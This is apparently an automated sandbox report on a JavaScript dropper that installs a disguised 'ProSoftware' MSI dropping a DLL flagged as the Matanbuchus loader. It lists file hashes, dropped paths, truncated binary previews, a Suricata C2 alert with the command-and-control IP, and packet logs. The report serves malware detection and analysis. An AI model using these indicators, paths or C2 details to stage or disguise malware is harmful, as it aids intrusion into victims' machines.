                                            SHA-512:9FD19931F2365D64B8D7CBC4BBEF7544F031C6515FAB728D1E11020CAC6070051E186CEB7E52429DEF6F559E58DB099D00D46B3BAE9BCA34AA0226B9160FE1C8
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_Matanbuchus, Description: Yara detected Matanbuchus, Source: C:\Users\user\AppData\Roaming\silver\libcurl.dll, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 5%
                                            Joe Sandbox View:
                                            • Filename: klog.php.msi, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6=..Xn..Xn..Xn..[o..Xn..]oL.Xn..\o..Xn.Y]o..Xn.Y\o..Xn.Y[o..Xn..Yo..Xn..Yn..Xn.Y]o..Xn.YXo..Xn.YZo..XnRich..Xn........PE..L...%.Rg.........."!...&......L.....{.........................................O.....$A....@.........................@...........x.....O.h.....................O.PK......................................@............................................text...`........................... ..`.rdata..............................@..@.data...\.J.........................@....reloc..PK....O..L..................@..B.rsrc...h.....O.....................@..@................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Installer\MSI67E2.tmp

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: klog.php.msi, Detection: malicious, Browse
                                            • Filename: fes.msi, Detection: malicious, Browse
                                            • Filename: zdi.txt.msi, Detection: malicious, Browse
                                            • Filename: merd.msi, Detection: malicious, Browse
                                            • Filename: medk.msi, Detection: malicious, Browse
                                            • Filename: lavi.msi, Detection: malicious, Browse
                                            • Filename: Document-v09-42-38.js, Detection: malicious, Browse
                                            • Filename: Document-v05-53-20.js, Detection: malicious, Browse
                                            • Filename: FW3x3p4eZ5.msi, Detection: malicious, Browse
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                            C:\Windows\Installer\MSI6850.tmp

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                            C:\Windows\Installer\MSI6890.tmp

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                            C:\Windows\Installer\MSI68B0.tmp

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                            Category:dropped
                                            Size (bytes):446944
                                            Entropy (8bit):6.403916470886214
                                            Encrypted:false
                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                            Malicious:false
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                            C:\Windows\Installer\MSI68F0.tmp

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1727
                                            Entropy (8bit):5.5771999728476045
                                            Encrypted:false
                                            SSDEEP:24:hTg4BtTUTXNhu6SHfbopWzlzbastcZpUWfUFP37rPJG9Q1E7DcqvSDhiS/zAfgx2:FSTBNspz6mP3PUmE7aD8S/XDI
                                            MD5:FBF7DD5E54067A4B4984207068C3B00C
                                            SHA1:F0FE278CDC9EFCA773F4CA623C22DD4BA5432977
                                            SHA-256:CC62FC9F2EF2ACFB5425E6066B0AE812EA6C1A28424B5B0284CCFB7399483804
                                            SHA-512:20281BBDC46D753650494AF358D5A38C540DDB9A7CD614543A5ADF7F25423C20E8372A4F7CEC24ECE8F3E73EFF71A6C38BC756BDAD337981C803739F54747078
                                            Malicious:false
                                            Preview:...@IXOS.@.....@...Y.@.....@.....@.....@.....@.....@......&.{77E11148-E1F4-45C0-AAA9-BBA409C05474}..ProSoftware..klog.php.@.....@.....@.....@........&.{3E648317-E941-449A-AF72-39AC6882CB87}.....@.....@.....@.....@.......@.....@.....@.......@......ProSoftware......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@.......@.....@.....@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB},.01:\Software\Blueray INC\ProSoftware\Version.@.......@.....@.....@......&.{08BCD781-A01D-4960-A91D-D4E69633EB46}1.C:\Users\user\AppData\Roaming\silver\libcurl.dll.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".7.C:\Users\user\AppData\Roaming\Blueray INC\ProSoftware\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@.

                                            C:\Windows\Installer\MSIEB4E.tmp

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {3E648317-E941-449A-AF72-39AC6882CB87}, Number of Words: 10, Subject: ProSoftware, Author: Blueray INC, Name of Creating Application: ProSoftware, Template: ;1033, Comments: Set database, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                            Category:dropped
                                            Size (bytes):978944
                                            Entropy (8bit):6.982712024960584
                                            Encrypted:false
                                            SSDEEP:12288:xtu6QnN5MN+Y9x0ECIgYOx5fnL/tYi8OBZr7AicRXrdq3u8bJk:xtuxnNTY9x0ECIgYmfLVYeBZr7AM
                                            MD5:18D5F1A9BFB3E34FF25BBDA3F05D386F
                                            SHA1:4B4394E1C8D91B4D7D1BEC0C4A443FA08243994F
                                            SHA-256:55A33165FBA0F7134E4CA482E0951C143B04E6A0E78FDC5F702E74E08BFD9249
                                            SHA-512:050747B91C89396A945E3A7E4BBE10F16CE2627D531DB087DDEF86817FBD9FD1C4E067D3CBB522380D2B1A5F50696797064A19E78DD5A8ABC5A35C03DBE843FE
                                            Malicious:false
                                            Preview:......................>.......................................................D.......`......................................./...0.......................................................................................................................................................................................................................................................................................................................................................................................................;...........!...3............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...4...2...:...?...5...6...7...8...9...>...<.......=...........@...A...B...C...........F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                            C:\Windows\Installer\inprogressinstallinfo.ipi

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.5663884348612083
                                            Encrypted:false
                                            SSDEEP:48:L8PhluRc06WXOGnT51mj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:yhl1InT+CyHvECkWWvyH
                                            MD5:017E45179C6CE2D0B525AF66165DA755
                                            SHA1:19178F5B3FB5DAEAE01ADB078DE9619226BC6940
                                            SHA-256:FDB571430870B8A4BD95698B0EB4274E13F7CCCD2DFAB7BBF1698E7AFD8B9BA5
                                            SHA-512:0B42B77B3A7CECDF76F20744EF20EFB9D38A4213110720DC23492566F5E480E849B0555F92C9501381C069984999D7FCF69E7F0D6D6DF6F9C3282A901CA0A718
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DF189CA5C6309A7118.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):73728
                                            Entropy (8bit):0.1379041469651897
                                            Encrypted:false
                                            SSDEEP:48:fQgTeHOfDSCHOf6HOfDSCHOfdAECiCyoq9WuSi2R22x:GyHbyHvECkWWI
                                            MD5:8AFFEB4B56B67A79B6ECD797C357FC96
                                            SHA1:BB9BDE2C70CCBEDCA26A8175F12C9E2650675575
                                            SHA-256:E9851DA8B0285F5D2AF87E8A21984D01609C13ABC42FC642EC76F1F22869B202
                                            SHA-512:E65866F338DBC581091C7A3A25C893612E31938796921B344307E1C7B24E9775AF5A0F8FA981A8671A6E94BF27A78B59A25909DBEBED37183B1E2A121275807D
                                            Malicious:false
                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DF2B4C5B26CBA5F775.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.2552588110954588
                                            Encrypted:false
                                            SSDEEP:48:liduDNvGFXOlT5Ymj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:cdPoTZCyHvECkWWvyH
                                            MD5:0AFB6383CC866AB0EDFFB36E2A2BC842
                                            SHA1:213347C5B7A60075764D85A0FA9435143F96EBA1
                                            SHA-256:A5F8573B55FE0E4746B08D980DCA05559EA4350C3A4F98D78B7AD499AF8ED9DB
                                            SHA-512:D352BA22703B610FD3A883EE5E620DABE7766D819FDC43D88BFDEF6C725B9978972DB74045B73AA805122D77314BF67937F67A51A646A84950AD96D08963A963
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DF348CB24DAC154FF7.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.2552588110954588
                                            Encrypted:false
                                            SSDEEP:48:liduDNvGFXOlT5Ymj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:cdPoTZCyHvECkWWvyH
                                            MD5:0AFB6383CC866AB0EDFFB36E2A2BC842
                                            SHA1:213347C5B7A60075764D85A0FA9435143F96EBA1
                                            SHA-256:A5F8573B55FE0E4746B08D980DCA05559EA4350C3A4F98D78B7AD499AF8ED9DB
                                            SHA-512:D352BA22703B610FD3A883EE5E620DABE7766D819FDC43D88BFDEF6C725B9978972DB74045B73AA805122D77314BF67937F67A51A646A84950AD96D08963A963
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DF38E4762414E69C91.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DF727BDCA303735F96.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DFA8BE88EF487BECD8.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.5663884348612083
                                            Encrypted:false
                                            SSDEEP:48:L8PhluRc06WXOGnT51mj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:yhl1InT+CyHvECkWWvyH
                                            MD5:017E45179C6CE2D0B525AF66165DA755
                                            SHA1:19178F5B3FB5DAEAE01ADB078DE9619226BC6940
                                            SHA-256:FDB571430870B8A4BD95698B0EB4274E13F7CCCD2DFAB7BBF1698E7AFD8B9BA5
                                            SHA-512:0B42B77B3A7CECDF76F20744EF20EFB9D38A4213110720DC23492566F5E480E849B0555F92C9501381C069984999D7FCF69E7F0D6D6DF6F9C3282A901CA0A718
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DFBB83DEC75FD4CE26.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DFD797B9F044BFEDD4.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DFF694B829BB320708.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):512
                                            Entropy (8bit):0.0
                                            Encrypted:false
                                            SSDEEP:3::
                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                            Malicious:false
                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DFFB1D1DDBAAC07A7F.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):32768
                                            Entropy (8bit):1.2552588110954588
                                            Encrypted:false
                                            SSDEEP:48:liduDNvGFXOlT5Ymj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:cdPoTZCyHvECkWWvyH
                                            MD5:0AFB6383CC866AB0EDFFB36E2A2BC842
                                            SHA1:213347C5B7A60075764D85A0FA9435143F96EBA1
                                            SHA-256:A5F8573B55FE0E4746B08D980DCA05559EA4350C3A4F98D78B7AD499AF8ED9DB
                                            SHA-512:D352BA22703B610FD3A883EE5E620DABE7766D819FDC43D88BFDEF6C725B9978972DB74045B73AA805122D77314BF67937F67A51A646A84950AD96D08963A963
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Windows\Temp\~DFFB99D1B666EC9AAA.TMP

                                            Download File
                                            Process:C:\Windows\System32\msiexec.exe
                                            File Type:Composite Document File V2 Document, Cannot read section info
                                            Category:dropped
                                            Size (bytes):20480
                                            Entropy (8bit):1.5663884348612083
                                            Encrypted:false
                                            SSDEEP:48:L8PhluRc06WXOGnT51mj2rHOfDSCHOfdAECiCyoq9WuSi20HOfDSCHOfBTlQ:yhl1InT+CyHvECkWWvyH
                                            MD5:017E45179C6CE2D0B525AF66165DA755
                                            SHA1:19178F5B3FB5DAEAE01ADB078DE9619226BC6940
                                            SHA-256:FDB571430870B8A4BD95698B0EB4274E13F7CCCD2DFAB7BBF1698E7AFD8B9BA5
                                            SHA-512:0B42B77B3A7CECDF76F20744EF20EFB9D38A4213110720DC23492566F5E480E849B0555F92C9501381C069984999D7FCF69E7F0D6D6DF6F9C3282A901CA0A718
                                            Malicious:false
                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            Static File Info

                                            General

                                            File type:ASCII text, with CRLF line terminators
                                            Entropy (8bit):5.879433038601054
                                            TrID:
                                              File name:Doc_21-04-53.js
                                              File size:977 bytes
                                              MD5:c10e7bce33b8d71ecd178565a63bb4ed
                                              SHA1:b2c32607a225fe745dd4d1f40e78578621728be1
                                              SHA256:09b473434edae856dc199c34092a9b4a9f735a0b0aeb1a03828fa215d1ce0237
                                              SHA512:10fd15544b0d676d45a9a07e06f3563949d9c2f8b7382b8f086777e0e1e482ee095fb4e8b4e8d8892940ed8d0dbb16dc293d998c38017a46e1c9e90b871871dc
                                              SSDEEP:24:dEsmSj2wouYUuKR+s0AXDRoiUMboz7I7GFD+NumTqYhjA:dEsMi58GoitoIatSuajA
                                              TLSH:F2111C46CD13EEE402BAA2D44EE96538CEE151804124E5E5BC9FF3F0569DB240A30EDB
                                              File Content Preview:// SIG // Begin signature block..// SIG // o3lghrkNHmy95KKmEUisGHk9XLVusIYcXP1r6PEi..// SIG // 8kZbJanxZdXnKYheZv9PqqIuiorVULYcBwh1IyC1..// SIG // RG7j6z5EYrWmDefQjBTtgJ1uqTmEDYvwz8q4Ltbw..// SIG // DCWxNnJe3bbnETsCUaHdDYHnlZRW3EYv5PFJpcP5..// SIG // q52n

                                              File Icon

                                              Icon Hash:68d69b8bb6aa9a86

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-12-06T22:20:25.117789+01002034468ET MALWARE Matanbuchus Loader CnC M31192.168.2.449751185.234.216.1754443TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 6, 2024 22:19:35.631171942 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:35.631211996 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:35.631299019 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:35.632998943 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:35.633011103 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:36.855926991 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:36.856013060 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:36.858412981 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:36.858424902 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:36.858690023 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:36.898291111 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:36.904001951 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:36.951330900 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.408849955 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.408905983 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.408962011 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.408987999 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.410211086 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.410260916 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.410269022 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.418407917 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.418476105 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.418483973 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.427918911 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.427969933 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.427977085 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.476389885 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.476397038 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.523261070 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.528732061 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.532948017 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.533000946 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.533009052 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.585781097 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.585788965 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.602710962 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.602780104 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.602787018 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.610344887 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.610400915 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.610409975 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.618161917 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.618232012 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.618237972 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.625389099 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.628041983 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.628047943 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.632913113 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.636049032 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.636055946 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.640479088 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.644042969 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.644048929 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.647874117 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.647952080 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.647958994 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.662791967 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.662856102 CET44349730104.21.40.3192.168.2.4
                                              Dec 6, 2024 22:19:37.662895918 CET49730443192.168.2.4104.21.40.3
                                              Dec 6, 2024 22:19:37.662904024 CET44349730104.21.40.3192.168.2.4
